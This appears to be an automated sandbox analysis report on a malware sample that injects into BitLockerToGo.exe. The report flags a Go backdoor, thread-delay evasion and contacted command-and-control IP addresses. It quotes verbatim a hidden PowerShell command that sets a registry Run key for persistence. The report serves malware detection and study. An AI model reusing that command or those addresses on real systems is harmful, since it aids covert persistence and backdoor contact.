    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: BwqqVoHR71.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: BwqqVoHR71.exeStatic file information: File size 19172088 > 1048576
    Source: BwqqVoHR71.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4dca00
    Source: BwqqVoHR71.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc87e00
    Source: BwqqVoHR71.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Suspicious powershell command line found
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
    Source: BwqqVoHR71.exeStatic PE information: section name: .symtab

    Boot Survival

    barindex
    Creates an autostart registry key pointing to binary in C:\Windows
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1972Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1407Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 1972 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 1407 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: BwqqVoHR71.exe, 00000000.00000002.1996444537.0000000001FAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
    Source: BitLockerToGo.exe, 00000005.00000002.3048388496.0000000002F28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Allocates memory in foreign processes
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 23D008Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8CC000Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: B78000Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: BDB000Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: BDC000Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: C0A000Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected GO Backdoor
    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7652, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected GO Backdoor
    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7652, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
    Command and Scripting Interpreter    		11
    Registry Run Keys / Startup Folder    		311
    Process Injection    		1
    Masquerading    		21
    Input Capture    		1
    Security Software Discovery    		Remote Services21
    Input Capture    		1
    Non-Application Layer Protocol    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		1
    DLL Side-Loading    		11
    Registry Run Keys / Startup Folder    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media1
    Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		311
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive1
    Proxy    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
    System Information Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    BwqqVoHR71.exe29%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://crl.microsoft0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://www.certum.pl/CPS00%URL Reputationsafe
    http://subca.ocsp-certum.com020%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    http://crl.certum.pl/ctnca2.crl0l0%URL Reputationsafe
    http://repository.certum.pl/ctnca2.cer090%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    http://www.certum.pl/CPS00%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://93.185.159.253/false
      		unknown
      http://188.130.206.243/false
        		unknown
        http://46.8.232.106/false
          		unknown
          http://46.8.236.61/false
            		unknown
            http://91.212.166.91/false
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://cevcsca2021.ocsp-certum.com07BwqqVoHR71.exefalse
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://picsum.photos/208/500BwqqVoHR71.exefalse
                  		unknown
                  http://crl.microsoftpowershell.exe, 00000006.00000002.2006769465.00000000073AB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://188.130.206.243BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpfalse
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://93.185.159.253BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpfalse
                        		unknown
                        http://46.8.236.61BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpfalse
                          		unknown
                          http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0wBwqqVoHR71.exefalse
                            		unknown
                            https://www.certum.pl/CPS0BwqqVoHR71.exefalse
                            • URL Reputation: safe
                            		unknown
                            http://repository.certum.pl/cevcsca2021.cer0BwqqVoHR71.exefalse
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://91.212.166.91BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://46.8.232.106BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://188.130.206.243http://46.8.232.106BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://subca.ocsp-certum.com02BwqqVoHR71.exefalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://aka.ms/pscore6lBfqpowershell.exe, 00000006.00000002.2002646379.0000000004B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://picsum.photos/500/500%02x:%02x:%02x:%02x:%02x:%02xBwqqVoHR71.exefalse
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.certum.pl/ctnca2.crl0lBwqqVoHR71.exefalse
